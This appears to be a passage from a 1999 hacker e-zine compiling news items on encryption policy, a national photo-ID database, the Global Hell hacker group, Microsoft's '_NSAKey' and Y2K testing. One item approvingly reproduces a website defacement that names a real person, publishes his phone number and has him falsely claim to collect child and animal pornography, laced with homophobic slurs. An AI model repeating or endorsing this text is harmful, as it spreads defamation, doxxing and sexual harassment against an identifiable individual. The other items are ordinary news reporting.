launched to crack criminal codes on the net Government starts Ł20 million anti-encryption force amid claims that US has Windows super key Links, reports and background: more about privacy on the net Richard Reeves, Society Editor Sunday September 5, 1999 A specialist code-cracking unit is being set up to counter the growing use of encrypted e-mail messages by drug-runners and paedophile rings. The unit, with funding of Ł15-20 million will draw staff from the Government's communications centres at GCHQ - but will also headhunt top code designers from the private sector. 'You could compare it to cracking the Enigma code during World War Two,' said one senior Government source. 'We need an Alan Turing for the Internet age.' Big salaries will be offered to lure high-flying programmers into the unit, which will be given a deliberately anodyne name - almost certainly the Government Telecommunications Advisory Centre. 'The major criminal organisations, especially the drugs cartels, are incredibly sophisticated. They have the money to have whole departments working on codes. For now the encryption problem is not huge - but it is going to grow and we need to be ready for it,' said the source Combined with fingerprint access, encrypted e-mail messages are likely to become the communication of choice for serious criminals, according to the intelligence services. Legitimate businesses are also poised to use encryption to protect market-sensitive information, with two-thirds of firms saying that security fears were the biggest barrier to joining the e-commerce revolution, according to a Department of Trade and Industry survey. Since the Government abandoned plans to force all users of encryption to deposit a key with a 'trusted third party' - a move fiercely opposed by business - attention has focused on beefing up the detection of electronic data by law enforcement agencies. 'We are ending up with one of the most liberal regimes in the world,' said a DTI official. 'This makes interception of messages and rapid decoding vital.' Experts at the National Criminal Intelligence Service (NCIS), which will also provide staff and support for the unit, said that gathering real-time information was crucial to the police and customs. 'Given enough time and computer power, most codes can be cracked,' an NCIS expert said. 'But cracking a code two weeks after a message has been intercepted is more often than not completely useless, given that details of deals, time and place, are what we need. Real-time information is gold-dust.' The intelligence and law enforcement services hope the team of code-crackers will help electronic eavesdropping as fruitful as phone-tapping has been in recent decades. During 1996 and 1997, interception of communications - almost entirely phone taps - resulted in 1,200 arrests, seizure of 115 tonnes of illegal drugs and 450 firearms, according the Home Office. More than half of the 2,600 interception warrants issued by the Home Secretary resulted in arrests. Some of these are already the result of e-mail interception, but the Home Office does not advertise the success of 'e-taps'. Later this year the DTI is introducing a Bill on electronic commerce, which will put in place a voluntary system of accreditation for firms using the Internet to conduct business. The Bill will also give law enforcement agencies the right to demand the computer key to an encryption 'key', having been granted a warrant as part of a criminal investigation. But intelligence officers said this power was of limited value because demanding an encryption key tells criminals they are under investigation. The Government will be at pains to allay fears of a Big Brother state intercepting personal e-mail. 'The idea that we have any interest in the communications of anyone other than serious criminals, or indeed the resources, is laughable,' said the NCIS source. @HWA 17.0 Nationwide Identity Database Plans Started in 1997 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by mortel Earlier this year it had been reported that Image Data LLC in New Hampshire had been buying up driver license photo's and other information from around the country to create a nationwide identity database. The Electronic Privacy Information Center has discovered from over 300 documents obtained via the Freedom of Information Act that the original idea for this plan came about back in 1997 when it was first presented to the US Secret Service. Wired http://www.wired.com/news/news/politics/story/21607.html Electronic Privacy Information Center http://www.epic.org/ Smile for the US Secret Service by Declan McCullagh 3:00 a.m. 7.Sep.99.PDT WASHINGTON -- A New Hampshire company began planning in 1997 to create a national identity database for the federal government, newly disclosed documents show. Image Data's US$1.5 million contract with the US Secret Service to begin digitizing existing driver's license and other personal data was widely reported early this year. But documents unearthed by the Electronic Privacy Information Center reveal the details and scope of the project. An Image Data presentation to the government -- marked confidential -- stressed that pilot projects in three states would "ensure the viability of deploying such service throughout the United States," according to about 300 pages of files EPIC obtained under the Freedom of Information Act. In a February 1999 report, Image Data CEO Robert Houvener ridiculed the idea that there were any legitimate privacy issues at stake, including those raised by civil libertarians when the project was first disclosed. "Many other newspapers, television programs, magazines also did news stories on Image Data LLC and its system [that] in some cases ... focused on the 'Privacy' concerns and presented an inaccurate presentation," Houvener wrote. But privacy groups aren't wavering. "We think that their proposal for a national database of photographs runs directly contrary to the types of privacy safeguards that should be developed," says EPIC director Marc Rotenberg, who met with Houvener last week. "This is not a database that people can easily opt out of. You have to give up your photograph when you get a driver's license." Houvener, who says he has been a "victim of identity fraud," says his national photo file will be targeted at "identity criminals" that he estimates cost businesses billions of dollars a year. US legislators who funded the project believed the database would be used to stop illegal immigrants and terrorists. "The TrueID technology has widespread potential to reduce crime in the credit and checking fields, in airports to reduce the chances of terrorism, and in immigration and naturalization to verify proper identity," said a September 1997 letter from eight members of Congress to Image Data. Image Data's "True ID" technology currently feeds photos into its database in one of two ways. The company has contracts with state motor vehicle departments that supply the analog negatives or the digital images on magnetic tape. It also persuades shoppers to scan their IDs into the database by inserting them into devices at specially equipped stores. After news reports appeared focusing on the project, the governors of Colorado and Florida halted the transfer of images to Image Data, and South Carolina filed suit asking for the return of millions of images already in the company's possession. How did Image Data feel about South Carolina's actions? "The PR, legal, and legislative situation in the pilot State will continue to be evaluated and dealt with," a January 1999 company report says. Image Data has publicly downplayed the Secret Service's involvement, but the documents show that the agency decided which states would be part of the initial pilot project and directed the timing of the effort. According to one of Image Data's monthly reports sent to Special Agent Cary Rosoff of the Secret Service's financial crimes division, company representatives were negotiating a contract with Missouri officials, too. "Missouri [is] in the final stages of implementing a digital driver license system. Most issues are resolved, and we expect closure within 4-6 weeks," the document says. The Secret Service deleted some information from the documents before releasing them, and only a few pages prepared by the government are included. But it seems that discussions of the project began in early 1997. The government signed an agreement with Image Data in late 1997 and the contract took effect on 15 December of that year. Soon after, the company began to work closely with Telecheck, a subsidiary of First Data Corporation. By mid-June 1998, the computer interface between Image Data and Telecheck was complete and images could readily be exchanged. One frequent problem: Scanning millions of existing 35 mm photos into the database. "The digitizing machine is behind schedule.... There has also been some slippage due to the custom machining of the components for the scanner itself," the documents reported about Colorado DMV photos. Another headache for Image Data executives was Florida's policy of allowing drivers to renew their licenses twice by mail. That means people are less likely to come in and be photographed by digital cameras, which can automatically forward the photo to Image Data. "For a state like Florida, [up] to 45 million negatives would have to be digitized to get an online image of all current licenses," a November 1998 report says. The documents show how Image Data planned to sell the idea not just to the federal government, but also to state officials. "This program will demonstrate a highly effective way of ... increasing tax revenue. The positive impact of this demonstration cannot be ignored. Once government agencies and businesses see the effectiveness of this technology and implement it for their own programs, the positive impact to state and federal budgets will be in the billions of dollars per year," says one Image Data proposal that is marked "proprietary." @HWA 18.0 Game Boy Advance to Connect to the Internet ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by frost_frozen While over a year away from release (nothing like a little advance hype) the next version of Nintendo's Game Boy will have Internet connection capability. The Game Boy Advance will be able to use a cell phone and modem to connect to Internet to play network games, exchange pictures, chat, and even read and send email. (And I wonder what other interesting things that it can be made to do. hehehe) Wired http://www.wired.com/news/news/technology/story/21590.html Game Boy Gets the Net Picture by Andy Patrizio 3:00 a.m. 4.Sep.99.PDT When you see a kid furiously punching away at a Game Boy, you should ask not just what he's playing, but with whom, and if you can see what they look like. Nintendo announced that its next-generation handheld game device will connect with cell phones and digital cameras. The phone connection will allow players to download games from the Internet, play against others online either one-on-one or in multi-player games, take part in real-time chat, and even send and receive email. Code-named the Game Boy Advance, it will use a 32-bit RISC chip developed by ARM Holdings, of Cambridge, England. ARM's chips are most often used in cellular phones. In addition to the cell phone connection, the Game Boy Advance can connect to a digital camera that is more advanced than the one currently available for Game Boy Color. Using both the Internet connection and digital camera, players will be able to see each other while playing, according to a Nintendo spokesman. These add up to lots of ways to rack up phone charges when mom and dad aren't looking. The Game Boy Advance won't be on the street anytime soon, however. Nintendo said it will hit the Japanese market in August 2000, and be available in the US and Europe in time for Christmas 2000. Pricing has not been determined. The Game Boy Advance will be fully back-compatible with the original and color Game Boys currently on the market. It can also be hooked up to Nintendo's forthcoming Dolphin console. Players will be able to transfer games or characters from the Dolphin to the Game Boy Advance or vice versa. Along with the new handheld unit, Nintendo announced a joint venture with Japanese game vendor Konami. The new company, Mobile 21, will develop software that will optimize interaction between the Game Boy and Dolphin platforms. @HWA 19.0 South African Security Industry goes Loco over Portscan ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Wyzewun Recently, I recommended on the IOZ.Security mailing list that an audit of as much of the South African internet as possible should be done, and some conclusive statistics as to the non-existant state of computer security in our country should be made public, without disclosing hostnames etc, just percentages. All posts in response to it recommended that I go through with the idea and not one complaint was recieved. Everything looked good.I did a pleminary portscan on one of the hosts I was going to audit, but didn't go into actually checking for potential security holes. I thought nothing of it, until suddenly everyone I knew was talking to me about things like "causing quite a stir, eh?" to which I abtly responded "Huh?" Turns out it was a box run by the chief security dude from ISPA (The ISP Association of SA) and he was bitching and whining about the scan publically on the mailing list, pretending to simply "not notice" any of my posts telling people it was going to happen. Soon enough things like "He compromised the server which he portscanned from" were being said which is total bullshit since it was an ISP that I do... well, now *used* to do security consultancy for. I don't know exactly what was said exactly, and honestly, I don't want to know. It's just too pathetic. The fear 90% of the sys admins were struck with was astounding, and manifested itself in all sorts of ridiculous things, even plans to sue me as soon as I tried to portscan them. (Yes, I know for a fact was planning to do this to me - how sad) But even still, no-one just stood up and said "Hey, please don't portscan me when you do the audit - thanks." Their incompetency made them petrified of the very idea of being showed up by some-one without as many fancy certificates as them, and the "Get scanned and look like an idiot" and "Don't get scanned and look like an idiot" options were a kind of a Catch 22 situation for them. But think about it, what is a portscan? It's a widely accepted standard for checking what ports are open. Netcat is a standard util with most Linux distros these days, and has portscanner functionality. Nmap is a tool commonly used by admins everywhere. And besides, it is *completely* unlike actually probing for vulnerabilities, or attempting to overflow their FTP daemon. And ultimately, if you don't *want* people to portscan you - don't make it possible - get Portsentry or something. Yet, they freaked out notably, my accounts on the ISP got suspended without explanation, along with the possibility of me being able to put them down as a reference on my CV and I am now pretty much homeless on the internet. (Well, I'll be getting my FreeBSD server online soon, so all is not lost, but this just gives you an idea of the fucked up kind of people who call themselves "security consultants" in our country. ;-) Epilogue: After my post to the IOZ.Security mailing list telling them they were being complete idiots, and subsequent unsubscription, it appears the majority of the occupants had a sudden change of heart. In fact, a good friend of mine got flamed until he roasted for saying "Maybe you should just spend less time scanning and more time studying for your upcoming finals" - guess there are two faces to every beast. ;) @HWA 20.0 Owner of ZANet IRC Network runs into trouble ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Wyzewun of FK Pieter Immelman, aka. Gaspode , the owner of ZANet, the largest South African IRC network, seems to have finally gotten a bit of his karma back. For years now he has had a reputation for k-lining everything in sight for any reason his sick twisted mind can fathom, and has never had any intention on stopping acting like that. However, recently, it seems that he has annoyed a few of the wrong people and as a result, many South African websites have suddenly become "Hacked by Gaspode" pages. There were a great variety of these, I only archived one, but it will give you a pretty good idea of what they were like... Hacked by Gaspode y0 y0 y0 This is Gaspode, the pheered IRCop from ZANet rapping to y'all over my Hax0red airwaves - Aight. Listen up, coz I got a message for duh werld! Pheer Gaspode! He is the IRCop that k-lines everything in site! Pheer Gaspode! He can Hax0r anything on this planet! Pheer Gaspode! He runs an IRC network like a facist state and enjoys it! Jez, joo are all 0wned by Gaspode, and there is nothing you can do about it! I can hax0r crax0r any bawx on the i-net, and in the unlikely event that I can't, I will have gay anal sex with your Sys Admin until he bleeds! Phone me and tell me how much you pheer me on (021) 530-1200, my name is Pieter Immelman. Joo can't pr0ve anything - I do not pheer joo. If I'm not in, feel free to talk to my boss, I'm sure he'll be perfectly happy to phonesex joo! Ha Ha - Just joking Boss Man, I know you only have phone sex0r with me ;-) Heck, If you don't feel like talking to me about me hax0ring your site, you can try and get me to take your niq of hold. Hmm - I don't even know what your niq is - but I'm sure I have it on hold. I have everyone's niq on hold. Would you like to take your nick off hold? Please visit my favourite sites, www.gayporn.com and www.gaspode.org/~pi - I don't have the kiddie porn up on the second site yet - sorry about the delay, but my boyfriend hasn't finished with it yet. If you would like to contribute to my small collection of kiddie and animal porn (Only a measely 25GB so far) you can mail it to me at pi@gaspode.org - I would love to get anything you have - especially cum shots. Gawd, I L0VE cumshots! They makez0r me itch all over and get all fagular. Greetz tew all my bumchums in #gaysa and all my leet friends in #hack - J00 GuYZ 0WN M4N!!! All my Love, Gayspud The rest followed pretty much the same pattern, except the rest made references to Aztec, the company he works for - which I assume caused a bit of friction between him and his boss. An unamed ZA hacker stated on SABC Special Assignment that these hacks would continue until Gaspode delinked from ZANet. The SABC also tried to contact Gaspode, but he refused to comment on the matter. @H @HWA 21.0 Global Hell Expose ~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by altomo A long hard look at Global Hell and some of its members including MostHated, ben-z, altomo, egodeath, nostalg1c, Mnemonic and others. Global Hell or gH has been linked to well over 100 web page defacements and one of its members, Mindphasr (Chad Davis), has been arrested by the FBI. MSNBC http://www.msnbc.com/news/308025.asp Is Global Hell going legit? An exclusive look inside one of the digital underground’s most infamous groups By Brock N. Meeks MSNBC WASHINGTON, Sept. 6 Global Hell is dead; long live Global Hell This infamous digital underground clan, whose members have been the target of raids by the Federal Bureau of Investigation, claims to be in the midst of a dramatic about-face. We’ve gone legit, says gH co-founder Mosthated. WHERE ONCE GH WAS the scourge of sloppily administered Web sites everywhere, the group now claims it has sworn off such illegal activity. “We are not a hacker group,” Mosthated says, in an effort to distance the group from its negative press painting the group as a malicious “hacker gang.” gH rose to more than a minor annoyance when it was linked to the defacement of the official White House Web site earlier this year. A short time later several members of the group around the nation were raided by the FBI. No arrests were made, though computer equipment was confiscated. In the aftermath of the raid, a cyberspace border war broke out. The electronic underground erupted with a spate of Web site defacements, all vouching support for gH while spewing profanity-laden tirades at the FBI. In perhaps the ultimate insult to the FBI, its own Web site was put out of commission through a denial-of-service attack, which moved the bureau to shut down all public access to the site until the attack could be thwarted. Three members of the infamous 'Global Hell' hacker group that has been the target of repeated FBI raids. From left to right, ben-z, altomo, and egodeath On Aug. 30, the hammer dropped: A joint FBI and Army Criminal Investigation Command investigation resulted in the arrest of Chad Davis, a 19-year-old Wisconsin man also known as “Mindphasr,” a co-founder of gH, for breaking into a U.S. Army computer. Davis also had been raided earlier in the year in the first crackdown on gH. SCARED STRAIGHT An indication that the sea change among gH members as actually taken hold is what happened in the aftermath of Davis’ arrest: nothing. An urgent bulletin was released by iDefense, a consulting group that monitors electronic threats, after Davis’ arrest warning Web administrators to be on high alert for retaliation. It never came. Inside an IRC chat room where gH members congregate electronically, the word went out: No retaliation. It held, despite the fact that there are no hard and fast “ground rules” that bind the group. “There is no hard control,” says “nostalg1c,” a gH member, “we just know what we should and shouldn’t do.” gH is a loose coalition of 15 to 20 members spanning ages from 13 to 29, its members drawn from the United States, Canada, Belgium and Southeast Asia. A band of brothers — and one female — who find solace in their digital bonding wrapped around the camaraderie that comes from the sharing of knowledge about the most intricate workings of computers and computer networks. An indication that the sea change among gH members has actually taken hold is what happened in the aftermath of Davis’ arrest: nothing. Though the continued pursuit of gH by the authorities has resulted in but one arrest, the fallout has inflicted a kind of “scared straight” mentality on the group. “We have grown up and realized that hacking gets you nowhere but locked up,” says Mosthated, “unless you become a type of white hat hacker to hack for networks and businesses or being a consultant, which multiple people in gH have done.” Eighteen-year-old gH member “f0bic” put a fine edge on the FBI threat: “It made me realize that hacking isn’t really worth going to jail for.” When another gH member pleaded guilty to conspiracy charges related to breaking into government and military sites that were really done by Belgium-based member “nostalg1c” — when both were members of yet another hacker group — the light bulb came on: “At that point I realized it ain’t no game we’re playing,” nostalg1c said, “It is dangerous.” NO STEREOTYPES Members of gH are an eclectic blend whose lives, to date, could fill a couple of volumes of biographies. Several come from broken homes, others are living with both parents. Some have siblings; others are only children. “Ben-z” a 16-year-old who was raided by the FBI, goes to a private school now because “I was a trouble maker in public school,” and identifies himself , tongue-in-cheek, as a “jock, pothead, lush, asshole, geek, wigger.” His big inspiration: “I was a big fan of the movie ‘Tron’ when I was a kid,” he says. They all love the ladies. Several members have rap sheets; One has served time in prison for computer-related crimes dating back to the 1980s. All got into computers in their early teens, save for the group’s youngest member, “Jaynus,” who began to explore the inner workings of a Windows 3.1 machine at the age of 9. By and large, their parents are unaware of any nefarious computer activity, except for those whose homes have been visited by the FBI. “I don’t think that any parent is stupid enough to know that a kid that sits in his room endless hours and endless nights is just ‘chatting to his friends,’” says “obsolete.” “I think that any parent with half a brain actually knows that he is doing something semi-illegal.” And there is no shortage of “comeback” stories to be found here. If the maxim “lead from above” carries any truth, one of the most inspiring stories is found in gH’s own founder, Mosthated. Long before he was raided earlier this year by the FBI, the 19-year-old says he “went legit” and started working as a security consultant and setting up computer networks. Vallah, a former Microsoft programmer who was questioned by authorities for alleged connections to gH, encouraged Mosthated to pursue more legitimate programming ventures. “Vallah would tell me I had a future away from doing this kind of [illegal] stuff and taught me a lot of ways to just do what I love to do, but legitimately,” Mosthated says. “Don’t’ judge a whole group because of an individual’s mistake.” — MOSTHATED Computers also were a way to escape the mean streets of Mosthated’s neighborhood, he says, a place where “you with get locked up or die before you reach your 20’s.” Mosthated admits he’s been in trouble with the law “multiple times” but that he sees computers as his way out. He also credits his girlfriend with encouraging him to stay into computers, rather than stray back to the streets. There are no thoughts of disbanding gH, Mosthated says, despite the spate of negative publicity surrounding the group on the back of co-founder Davis’ arrest. “Don’t’ judge a whole group because of an individual’s mistake,” Mosthated says. ”[Davis] knows he messed up, and the only thing we can do is hope the best for him.” And then consider the 17-year-old “egodeath,” who is struggling with his new-found sobriety. Out of rehab for drug abuse, he’s diving into his computer as way to try and make reality without drugs more palatable. Staying clean is “the hardest thing I’ve ever done,” he says, noting that he didn’t realize how much he missed his computer until he was locked up over the summer and couldn’t get access to one. Now he holds a job at a video rental store and finds solace in the friends he’s made in gH. CHARITABLE ACTS The typical braggadocio relating computer break-in exploits was conspicuous by its absence when gH members talked to MSNBC. Instead, a surprising number of “random acts of kindness” were related. Several of the gH members now say they content themselves with “scanning” for security holes and informing the computer system’s administrator of the vulnerability. Such notices are essentially a “wake up call” that the computer system is a sitting duck. “Scanning is just like looking in the windows of a house,” Ben-z says. “That’s not illegal. But once you break the window and climb in, you’re in trouble.” Many of the gH members reported that when they informed a system administrator of a security hole, they were either cussed at or simply ignored. Others reported getting back messages of thanks for pointing out the flaws. Mosthated says that when a former member of gH attacked the FBI’s Web site, he called and offered assistance but was ignored. CAN’T KEEP A GOOD HACK DOWN As a group, gH may have sworn off breaking into computer systems, but several members acknowledged they still continue to “dabble” in the efforts for the continued thrill of it, but on their own and outside of activities that could be linked to gH as a group. Mnemonic, a 26-year-old gH member unabashedly admits that he’s “still very much into” penetrating computer systems. “It just annoys me when I see them deface websites,” he says. “If you noticed, most people who get caught defaced websites.” Mnemonic also can’t brook with what he calls the “we’re doing you a favor, kids,” referring to the line that some computer vandals use to justify their exploits. “You get into it, you know you’re doing something illegal,” he says, “That’s the fun about it. If it weren’t illegal, a lot of people wouldn’t do it.” Despite his own leanings, Mnemonic tells the younger members of gH: “If you’re going to do it, plan on getting caught.” @HWA 22.0 "NSA" key in Microsoft CryptoAPI ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by prozac Bruce Schneier, noted cryptography expert, has some interesting down to earth comments on the "NSA" key in the Microsoft CryptoAPI. Counterpane Systems http://www.counterpane.com/ OSALL has posted the first of several installments of an interview with Andrew Fernandes who was the first person to bring the "NSA" key to the publics attention. OSALL - Interview with Andrew Fernandes http://www.aviary-mag.com/News/Cryptonym_Interview/cryptonym_interview.html Cryptonym Interview 9/9/99 Mike Hudack Editor-in-Chief It was about a week ago that Andrew D. Fernandes of Cryptonym came out with the revelation that there´s a public key named "_NSAKey" in the Crypto API which is bundled with all versions of Windows since 95. The media jumped on it quickly -- demanding comment from Microsoft and the like. The entire issue ended blowing up and some people ended up with a little egg on their faces -- including OSAll. In order to kind of wrap things up, OSAll ended up speaking with Andrew Fernandes at length -- for more than an hour. Following is the first installment of our discussion, written verbatim from the recording. The Interview: I´m afraid I didn´t have too much time to put everything together here... You know, school and everything. So just bear with me. That´s alright. I was reading your Web site just a little bit ago. Not bad. I like what I´ve been seeing, too. But anyway... You know, for legal reasons, I have to go through the whole thing... You´re being recorded now, everything is on the record, da da da... Everything we say will (hopefully) be printed verbatim, assuming the recording works right. If I have to do it by memory I´ll have to e-mail you to verify everything, of course. Oh, absolutely. One of my journalist friends who I kind of hold up as a hero... Says that everything should always be on record. I kind of live by it. Absolutely... It´s so true. I´ve had problems with things -- whether they´re on record, or off... It´s just a pain in the ass. All right... The first thing I want to ask you -- how long did you spend reverse engineering things before you came up with everything? Oh, well that. That´s actually a common misconception. I don´t know how it got started, probably because of some non-technical reporter. So you weren´t reverse engineering it? You decompiled it, right? No, not even that. The real story is considerably less glamarous. I wish I could point to some great genius on my part... That would be an absolute lie. Yeah, wouldn´t we all... What actually happened was I was doing some development work using Crypto API -- CAPPY -- and something wasn´t working. You know, it had nothing to do with cappy. I just happened to be using cappy because I wanted to see what it looked like. Something in my module wasn´t working and I was irritated. I don´t know if you´re a programmer... Yeah, somewhat. Yeah. Well I don´t know what you do when things aren´t working, but I just stare into never-never land. If I relax my brain, empty it out, maybe something will come to me. So, I was at one of those points and I was basically single-stepping my way through looking for the error. Something wasn´t working and I was thinking maybe the compiler was generating incorrect code, or... I wasn´t even looking at the program to be brutally honest, I was just staring at ta golf course... Clicking next, next, next. I don´t know how many times I was clicking the mouse. As I looked back at the screen I made a couple of simultaneous discoveries. One was that Windows NT, unlike Windows 95, allows you to one-step right into system DLLs. Okay, I never knew you could ever do that. The next thing was I was buried smack inside one of the DLLs... What was it? One of the Crypto API DLLs? Yeah, it was the [unintelligible] DLL... And you know, these words are popping out at me. There was RC4, and the one that really popped out to me was "key." You know, anything you can make sense of in assembly just pops right out. I don´t know if you´ve seen it, but the screen captures are up on the Web site. Yeah, I remember that. And NSA key. And I kind of focused on it, and I almost fell off my chair. It was like, "what the hell is THAT doing there!" Exactly, right... You start thinking, encrypt Rc4 -- so you kind of know instinctively where in the module you are. So, in point of fact, that´s exactly how I came across that. You know, it´s not glamorous, it´s not a particular spot of genius on my part, but it´s true. Well, I´d love to be able to make you out to be a genius and everything... But I guess that plan´s gone. Yeah, well, life´s hard. But anyway, yeah. I was actually kind of worrying about all the reverse engineering things people are e-mailing me about. They keep saying that Microsoft could slam me for reverse engineering it. And I keep yelling at them -- "I´m not reverse engineering it!" Well, I tell you, you know, everyone in the media, everyone outside the technical field in the media, gets something wrong in every story. Well actually one of the ones they got wrong, which I always found funny. It was one of the big networks. Well, Ian Goldberg has been in the news a lot. He´s the current you know, crypto darling boy. Especially with the things he´s been doing. So anyway, they asked me where I went to school. The University of Waterloo, a big crypto place... and he graduated the same year as me. Well, I left it at that... it was kind of a side bar and all. Well, next thing I know, a person in the National Post, one of Canada´s two national newspapers, says I studied computer science at the University of Waterloo. Now, I actually studied biochemistry and mathematics there! Needless to say, my almer mater was not very happy with that. I think I took one computer science course there... and I didn´t do too well either. It was like Fotran or something... Oh God... So, you know, little things like that happen, and they keep growing. And all of a sudden, you know, this is my first experience with the media. I´m having heart palpatations, you know, I´m like, "Oh my God! Oh my God!" Yeah, well, you know, when I deal with them every time I turn around and I watch something on TV which I was interviewed for something... I´m always wondering whether they´re going to make me look like an idiot or something. It really depends, I´ve discovered, on the reporter. Some of them take the time to really think about it, what may have been unsaid, what they´re assuming... and others just move and connect the dots as well as they may. And they have to make six column inches. Yeah, it is true with some of them... And I´ve written some nasty letters. Anyway, I want to get back on the track... I don´t want to take too much time on this. Well it was an interesting segway. Yeah, you´re right. Well, that´s how I found it. In terms of actual time now, to find out what was in there. It didn´t take a whole lot. One of the things in the public Crypto API documentation is that you have to look for the strings of the public and private keys prefixed by the headers "RSA1" and "RSA2." And that should mean something to anyone who´s ever used encryption toolkits for RSA. And, aah, right after that... One of the debugging... like on the screenshots, you can see "BSave Encrypt Public." And all of a sudden I´m like, "Aaah, BSave. Yeeah..." Yeah, RSA Data Security BSave Toolkit... Aaah... Yup. So, no brainer you know. After that it doesn´t take... You almost find this stuff without looking for it. Yeah, so you can even do a search... It doesn´t even take that... I mean if you´re actually looking for it. Yeah. In terms of, in terms of figuring out what was going on in I´d say miliseconds. It´s fully explained on one screen -- first check Key and then check _NSAKey. I mean, that´s one page of 386 Assembly Language. So you know, that was about it. Yeah. So when you actually found this, what were you thinking? Was it like, "Oh here´s a backdoor..." "Here´s..." You know, what? What were my first thoughts? Holy shit -- NSA stuck right in the middle... First of all, I thought it was incredibly stupid for someone to put the letters "NSA" right into the middle of a crypto module. Yeah, of course... Automatically, when anyone sees that, red flags go right up. Oh yeah, your red flags go way up. Now, I did not initially think that it was some sort of back door. You have to be careful with that term -- everyone has their different definitions of back doors. Yeah... But in terms of, could this be in some way connected with the NSA getting into your machine... And again, I´ll define that later on. I didn´t think of it immediately because it just seemed too stupid. To be brutally honest. Once I did... I had quite a while to think about this. I first found this in early August and I had a couple weeks to think about it before Crypto `99 in Santa Barbara. And even afterwards I just discussed it with people there and had another couple weeks to think about it before I put it on the Web site. And I started shifting through... I mean, "why the hell would that be there?" Now, I knew there would be two keys... Well, I tell you, I´ve done a lot of speaking with Microsoft on this subject. And they refuse to tell anyone even what that second key is there for. Well they kind of make rumbling noises about it being a backup key. Well they haven´t even said that... Yeah, they did in the Washington Post. They did? Okay I missed that. And the CCC, the Chaos Computer Club, they called me this afternoon and told me that in fact Microsoft Germany, Microsoft USA and Microsoft one other country had issued relatively contradictory contrary press releases... Well I´m not suprised. Well, you know, any large company... Yeah, absolutely. Anyway, the way events have progressed in the past year... Ever since Crypto API came out Microsoft has said, "look, before you load a CSP you have to get a digital signature from us." So you know there has to be a public signature somewhere in there. Well yeah, there kind of... there has to be. Oh no, no. There absolutely has to be -- if they´re going to use digital signatures there has to be. Oh, I meant in the sense that they´d have to get these things signed. So anyway, last August Cipher and the S in RSA... They were using maximum entry principals to look for embedded keys in executables. They were saying look, this is not a safe place to store your keys. You know, all root keys in a PKI are stuck in software somewhere. And if they´re there they can be found and changed. So they had run scanners over Microsoft programs and discovered that Crypto API there wasn´t one key -- there were two keys. And Microsoft did the typical "no comment, it´s our key... We know it´s there," you know... da da da... No comment. And the issue kind of died down. If they´re not going to tell you you just don´t know. Yeah, and there´s no way you could find out. So I did have some background, you know, rumbling somewhere in the top of my head and I did a little research later on. So it was known there were two keys. So along comes these labels, "Key" and "_NSAKey." Well, what I obviously did... First I fell off my chair, you know, I was shocked... "Holy Toledo! What´s that doing there?" You start running through reasons in your head -- well, why would that be there, or why could that be there? And I know Ian Goldberg did this too, with Zero Knowledge. The complete real explanation for it is that it´s a way for the NSA -- Or the only explanation that makes sense... The only explanation that covers the bases, or at least more consistently than other explanations... Is that that key is in some way is in the influence or control of the NSA. Well, of course, in crypto speak NSA can only mean one thing -- the National Security Agency. There´s two analogies I use depending on the reporter... The first is, well, the more conservative approach is: If you´re a software developer in the computer field and you´re talking about buying some IBM -- you´re not going to pretend you don´t know what IBM I´m talking about. And the other way of saying it is, "at the height of the cold war, can you imagine trying to convince the Russians that ICBM stands for `I Can Be very Mellow.´" It´s just not going to work. Had it been anywhere but the crypto module then for sure NSA could have stood for anything. But stuck in the middle of crypto verification, blah blah blah, it´s inconceivable that it could be anything else. Now, again, you can´t claim ownership, or who controls a key... you could split those hairs a thousand days from tomorrow. But -- I think it´s almost inarguable that the NSA had some input in that key. Whether that is a lot of input or a little input, whether it´s malicious... (to be continued) @HWA 23.0 9999 - Hey! That's today! ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Code Kid A day that had the potential to be as bad as Y2K has come and gone with barely a whimper. 9999, was once also used as an end of file character on some systems and it was feared that todays date may trigger unexpected results. Nando Times http://www.nandotimes.com/technology/story/body/0,1634,91073-144193-1007662-0,00.html String of nines in date prompts Year 2000 dress rehearsal Copyright © 1999 Nando Media Copyright © 1999 Associated Press By WILLIAM McCALL VANCOUVER, Wash. (September 9, 1999 7:10 a.m. EDT http://www.nandotimes.com) - It comes only once a century, and the day that lines up four "9s" arrived just in time to test whether the nation will have electric power when the millennium adds three "0s" to the calendar. Utilities used the occasion for a nationwide drill, coordinated by the North American Electric Reliability Council, to test preparedness plans and backup systems for Jan. 1, 2000. U.S. Energy Secretary Bill Richardson personally supervised a test of the computers controlling the national power grid as the clock struck midnight for Sept. 9, 1999, or "9-9-99" - an old computer command to end a program. The tests were designed to simulate electric outages in different parts of the nation, test communications under those circumstances and determine how utilities and agencies would respond. The results of this latest national Y2K readiness test of the power grid came up with another pair of "9s" - as in 99 percent ready for the millennium, Richardson said. "But there's still that 1 percent," Richardson said from the Bonneville Power Administration, a federal agency that transmits power throughout the Northwest. "And that 1 percent covers a lot of consumers." Richardson said he was concerned that eight major utilities and 16 smaller municipal utilities or power cooperatives were not fully Y2K ready. There are about 3,000 utilities in North America. "They are close, but close is not good enough," Richardson said. "I won't rest until all consumers can be assured that utilities have adequately prepared for a smooth rollover." The fear has been that any problems on Sept. 9 would be a precursor of the so-called Y2K or millennium bug - when computers could malfunction as they misread the year 2000 as 1900. Early computer programmers often used the numerical notation for Sept. 9, 1999, as the date representing infinity. They were sure the databases or programs would be replaced long before Thursday rolled around. The island of Guam - on the other side of the international dateline - was the first American territory to deal with the potential Sept. 9 problem. "It was a non-event for Guam," government spokeswoman Ginger Cruz said after officials triple-checked computer systems. "We can only hope that Y2K will be this uneventful." If any problems did develop, plenty of computer experts were on hand in Pennsylvania. There were 75 extra computer specialists and other staffers for PECO Energy Co., said spokesman Michael Wood. "This was really the first live test of the first vulnerable date," Wood said Thursday. "We believe this exercise reinforces our confidence - and hopefully it should increase the public's confidence - in electric and utility services come the new year." The North Carolina Electric Membership Corp. released a statement shortly after midnight saying officials there were pleased with early results of the test. "This drill was one of the many efforts we are making to be ready for the Y2K event," said Chuck Terrill, chief executive officer of the NCEMC, which coordinated the state's 27 electric cooperatives. In Atlanta, technicians at 